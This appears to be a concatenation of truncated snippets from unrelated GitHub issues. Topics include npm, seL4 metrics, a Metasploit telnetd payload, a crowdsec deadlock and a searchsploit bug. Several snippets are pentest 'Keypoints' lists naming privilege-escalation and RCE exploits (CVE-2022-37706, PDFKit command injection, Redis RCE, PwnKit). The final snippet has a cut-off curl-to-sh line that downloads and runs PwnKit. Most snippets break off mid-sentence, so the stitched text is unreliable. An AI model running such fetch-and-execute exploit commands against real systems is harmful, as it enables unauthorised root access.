-
and I'm not only referring to the `opener` part. It seems that it doesn't even do the `npm version patch` (which I've found surprising)
-
search for exploits in exploitdb will not work,
because regex go through filenames, which are for example 27526.tgz
instead in looking in exploitdb/files_{exploits, shellcodes}.csv and
return s…
-
Add possible CVE-2022-37706 to the following SUIDs:
https://www.exploit-db.com/exploits/51180
```sh
-rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlighten…
-
Keypoints:
- [PE] rpc.py -> https://github.com/ehtec/rpcpy-exploit/blob/main/rpcpy-exploit.py
-
Key points:
- PDFKit exploit --> https://www.exploit-db.com/exploits/51293 (pdfkit v0.8.7.2 - Command Injection)
- [PE] ruby -->https://gtfobins.github.io/gtfobins/ruby/#sudo
-
Key points:
- searchsploit calmav-milter
-
One of the criticisms of the current model is that:
a. FR=1 for two procesess in seL4 with a correct caps setup
b. FR=2 for two processes in linux-KVM guests.
But folks would consider (a) to be more…
-
This was a complaint I raised when we considered `telnetd` as a payload in #9364. It directly resulted in #9353 being written.
Several modules spawn an unauthed `telnetd` to create a session agains…
-
### What happened?
In my postgres logs, I stumbled across a reported transaction deadlock detected by the DBMS.
Postgres log:
```
2024-09-05 23:48:44.176 CEST [4952] crowdsec@crowdsec ERROR: de…
-
Keypoints:
- Redis 4.x / 5.x --> https://github.com/jas502n/Redis-RCE
- [PE] PwnKit --> https://github.com/ly4k/PwnKit
- -` sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/…